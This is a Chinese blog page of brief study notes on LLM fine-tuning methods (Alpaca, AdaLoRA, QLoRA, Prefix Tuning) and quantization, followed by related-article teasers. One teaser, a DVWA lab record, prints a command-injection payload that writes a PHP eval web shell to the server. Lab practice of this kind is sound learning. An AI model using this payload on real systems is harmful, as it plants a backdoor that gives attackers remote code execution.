【大模型】7 天 AI 大模型学习

因为想先快速把 llama 模型学习了,所以跳了两次课,这是这两次课的主要内容,后面有时间会补充上的 ~ 主要内容有:一些微调技术(Alpaca、AdaLoRA、QLoRA)、Prefix Tuning、Quantization


1. Alpaca

Alpaca 是一个由斯坦福大学开发的项目,用来微调大型语言模型(LLM)的工具。它基于 Meta 的 LLaMA 模型并通过微调使模型能够更好地完成指令跟随任务。
Alpaca 模型的训练特点:

  • 使用类似于 OpenAI 的 InstructGPT 风格的指令-响应数据集。
  • 通过成本较低的方式,生成了高质量的训练数据(使用 ChatGPT 来生成指令数据)。
  • 在中小规模模型上实现了较好的性能。

2. AdaLoRA (Adaptive LoRA)

AdaLoRA 是 LoRA(Low-Rank Adaptation of Large Language Models)的一种改进方法。LoRA 通过减少需要训练的参数数量,实现高效且低资源消耗的模型微调。AdaLoRA 的关键特点是:

  • 自适应性: 动态分配低秩分解的秩(rank)以适应模型不同部分的重要性。
  • 高效性: 在保持性能的同时进一步减少参数需求。
  • 应用: 在资源受限场景下对大型语言模型进行微调。

3. QLoRA (Quantized LoRA)

QLoRA 是 LoRA 的进一步优化版本,它结合了量化技术,降低了显存占用和计算成本。其特点包括:

  • 4-bit 量化: 对基础模型进行 4-bit 量化,显著减少内存和计算需求。
  • 结合 LoRA: 在量化后的模型上应用 LoRA 技术进行微调。
  • 性能: 在保持模型性能的同时,大幅降低了硬件资源需求。

4. Prefix Tuning

Prefix Tuning 是一种轻量级微调方法,主要用于生成任务(如自然语言生成)。其核心思想是:

  • 添加前缀向量: 为语言模型的输入添加可训练的前缀向量,而不修改原始模型参数。
  • 参数效率: 仅优化前缀参数,避免了大规模微调整个模型。
  • 应用: 在对话生成、机器翻译等任务中表现优异。

5. Quantization

量化(Quantization)是指将模型的权重和计算从高精度(如 32-bit 浮点数)降低到低精度(如 4-bit 或 8-bit)的过程,以加速推理并减少模型大小。常见方法包括:

  • Post-Training Quantization (PTQ): 在模型训练完成后进行量化。
  • Quantization-Aware Training (QAT): 在训练过程中考虑量化影响,从而提升性能。
    Quantization01 和 Quantization02 可能是指不同量化方法或优化策略的比较。

6. Quantization Methods for LLM

这部分可能介绍了针对大型语言模型(LLM)进行量化的具体方法和挑战:

  • Static Quantization(静态量化): 在推理前量化所有权重和激活。
  • Dynamic Quantization(动态量化): 推理时动态地量化激活值。
  • Mixed-Precision Quantization(混合精度量化): 在模型的不同层使用不同的量化精度(如 8-bit 和 16-bit 混合)。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/66240.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

网关如何识别和阻止网络攻击

网关在识别和阻止网络攻击方面扮演着关键角色,它通过多种技术和机制来确保网络的安全。以下是网关如何识别和阻止网络攻击的一些主要方法: 1.深度包检测(DPI) 网关可以对经过的数据包进行深度分析,检查数据包的头部、负…

操作系统复习(理论版)

目录 只会在选择填空出现类型 第一章:操作系统导论 操作系统介绍 不得不知道的概念 可能出现在答题的类型 第二章:进程调度 进程管理: 处理机调度: 进程同步: 死锁: 预防死锁: 避免死…

概述(讲讲python基本语法和第三方库)

我是北子,这是我自己写的python教程,主要是记录自己的学习成果方便自己日后复习, 我先学了C/C,所以这套教程中可能会将很多概念和C/C去对比,所以该教程大概不适合零基础的人。 it seems that python nowadays 只在人工…

Linux(Centos 7.6)命令详解:ls

1.命令作用 列出目录内容(list directory contents) 2.命令语法 Usage: ls [OPTION]... [FILE]... 3.参数详解 OPTION: -l,long list 使用长列表格式-a,all 不忽略.开头的条目(打印所有条目,包括.开头的隐藏条目&#xff09…

改善 Kibana 中的 ES|QL 编辑器体验

作者:来自 Elastic Marco Liberati 随着新的 ES|QL 语言正式发布,Kibana 中开发了一种新的编辑器体验,以帮助用户编写更快、更好的查询。实时验证、改进的自动完成和快速修复等功能将简化 ES|QL 体验。 我们将介绍改进 Kibana 中 ES|QL 编辑器…

基于Spring Boot的紧急物资管理系统

基于Spring Boot的紧急物资管理系统是一个非常实用的应用,特别是在应对自然灾害、公共卫生事件等情况下。该系统可以帮助管理者有效地追踪和分配物资,确保资源能够及时到达需要的地方。以下是一个基本的实现思路和一些关键组件: 项目规划 需…

机器学习基础-概率图模型

(一阶)马尔科夫模型的基本概念 状态、状态转换概率、初始概率 状态转移矩阵的基本概念 隐马尔可夫模型(HMM)的基本概念 条件随机场(CRF)的基本概念 实际应用中的马尔科夫性 自然语言处理: 在词…

Qt打包为exe文件

个人学习笔记 选择release 进入项目文件夹,查看releas生成的文件 releas文件路径 进入release看到exe文件,但是无法执行 将exe文件单独放到一个文件夹内 选择MinGW 用CD 进入存放exe文件的路径,输入下面指令 cd J:\C\Qt\test4-3-1 windeploy…

VScode怎么重启

原文链接:【vscode】vscode重新启动 键盘按下 Ctrl Shift p 打开命令行,如下图: 输入Reload Window,如下图:

Web安全 - “Referrer Policy“ Security 头值不安全

文章目录 概述原因分析风险说明Referrer-Policy 头配置选项1. 不安全的策略no-referrer-when-downgradeunsafe-url 2. 安全的策略no-referreroriginorigin-when-cross-originsame-originstrict-originstrict-origin-when-cross-origin 推荐配置Nginx 配置示例 在 Nginx 中配置 …

Hyperbolic dynamics

http://www.scholarpedia.org/article/Hyperbolic_dynamics#:~:textAmong%20smooth%20dynamical%20systems%2C%20hyperbolic%20dynamics%20is%20characterized,semilocal%20or%20even%20global%20information%20about%20the%20dynamics. 什么是双曲动力系统? A hy…

基于SpringBoot在线竞拍平台系统功能实现十五

一、前言介绍: 1.1 项目摘要 随着网络技术的飞速发展和电子商务的普及,竞拍系统作为一种新型的在线交易方式,已经逐渐深入到人们的日常生活中。传统的拍卖活动需要耗费大量的人力、物力和时间,从组织拍卖、宣传、报名、竞拍到成…

Ubuntu 搭建SVN服务

目录 ​ 1、安装SVN服务端 2、创建SVN版本库 3、修改SVN配置svnserve.conf 3.1 配置文件介绍 3.2 svnserve.conf配置 3.3 authz配置设置用户读写权限 3.4 passwd配置 用户名密码 4、启动SVN服务 4.1 配置开机启动 1、安装SVN服务端 sudo apt-get install subversion…

DataV数据可视化

阿里云 DataV 是一个强大的数据可视化工具,可以帮助用户通过创建丰富的图表、仪表盘、地图和互动视图,将复杂的数据转化为易于理解和分析的可视化信息。DataV主要用于大数据和实时数据的展示,可以帮助企业和个人更直观地理解数据背后的含义&a…

电子电气架构 --- 整车整车网络管理浅析

我是穿拖鞋的汉子,魔都中坚持长期主义的汽车电子工程师。 老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师: 所谓鸡汤,要么蛊惑你认命,要么怂恿你拼命,但都是回避问题的根源,以现象替代逻辑,以情绪代替思考,把消极接受现实的懦弱,伪装成乐观面对不幸的…

面试题解,Java中的“对象”剖析

一、说一说JVM中对象的内存布局?new一个对象到底占多大内存? 话不多说,看下图,对象的内存布局图 一个对象的内存布局主要由三部分组成:对象头(Object Header)、实例数据(Instance D…

DVWA 命令注入写shell记录

payload 127.0.0.1;echo "<?php eval($_POST["md"]);?>" > md.php 成功写入&#xff0c;访问查看 成功解析

MySQL(五)MySQL图形化工具-Navicat

1. MySQL图形化工具-Navicat Navicat是一套快速、可靠的数据库管理工具&#xff0c;Navicat是以直觉化的图形用户界面而建的&#xff0c;可以兼容多种数据库&#xff0c;支持多种操作系统。   Navicat for MySQL是一款强大的 MySQL 数据库管理和开发工具&#xff0c;它为专业…

非关系型数据库和关系型数据库的区别

&#x1f90d; 前端开发工程师、技术日更博主、已过CET6 &#x1f368; 阿珊和她的猫_CSDN博客专家、23年度博客之星前端领域TOP1 &#x1f560; 牛客高级专题作者、打造专栏《前端面试必备》 、《2024面试高频手撕题》 &#x1f35a; 蓝桥云课签约作者、上架课程《Vue.js 和 E…

信息科技伦理与道德1:绪论

1 问题描述 1.1 信息科技的进步给人类生活带来的是什么呢&#xff1f; 功能&#xff1f;智能&#xff1f;陪伴&#xff1f;乐趣&#xff1f;幸福&#xff1f; 基于GPT-3的对话Demo DeepFake 深伪技术&#xff1a;通过神经网络技术进行大样本学习&#xff0c;将个人的声音、面…